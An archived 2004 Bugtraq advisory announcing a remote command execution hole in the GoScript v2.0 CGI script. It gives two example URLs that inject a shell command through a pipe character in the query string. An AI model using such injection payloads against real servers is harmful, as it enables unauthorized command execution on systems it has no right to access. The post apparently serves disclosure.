[35963] in bugtraq

home help back first fref pref prev next nref lref last post

GoScript Remote Command Execution

daemon@ATHENA.MIT.EDU (Francisco Alisson)
Wed Aug 4 17:01:09 2004

Date: 4 Aug 2004 04:28:11 -0000
Message-ID: <20040804042811.18391.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com



GoScript Remote Command Execution

Version verified: 2.0
Author: Pete Stein http://www.slack.net/~pete/perl

GoScript v2.0 allow remote commando execution as we can see below:

http://www.server.com/go.cgi?|id|
http://www.server.com/go.cgi?artarchive=|id|

May be possible another methods of attack!

Thanks :)

[Infektion Group]
irc.phey.net 6667 -j #infektion
<Dominus_Vis>

home help back first fref pref prev next nref lref last post